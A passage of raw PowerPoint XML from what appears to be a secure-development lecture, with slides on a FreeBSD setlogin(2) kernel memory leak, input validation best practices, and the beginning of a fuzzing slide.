              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> NUL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>resulting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>. Up to 16 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>FreeBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> 8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> 32 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>FreeBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> 9 and 10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>leaked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>manner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>invocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>setlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>(2). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>contain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>portions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>buffers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>leverage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>obtain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>elevated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>. </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61</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>ractices:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>Apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>whitelists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>good</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>Canonicalise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0" smtClean="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>educ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2500" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>simplest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>searches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> UTF-8 input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> UTF-16, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> and bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>Check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" smtClean="0"/>
              <a:t>minimum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0"/>
              <a:t>and maximum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>lengths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>correct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" b="1" dirty="0"/>
              <a:t> syntax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0" err="1"/>
              <a:t>inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91140" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="5949950"/>
            <a:ext cx="710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a:t>https://www.securityninja.co.uk/secure-development/input-validation/</a:t>
            </a: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62</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>technique of randomly or selectively altering otherwise valid data and passing it to a program to see what happens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>short</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
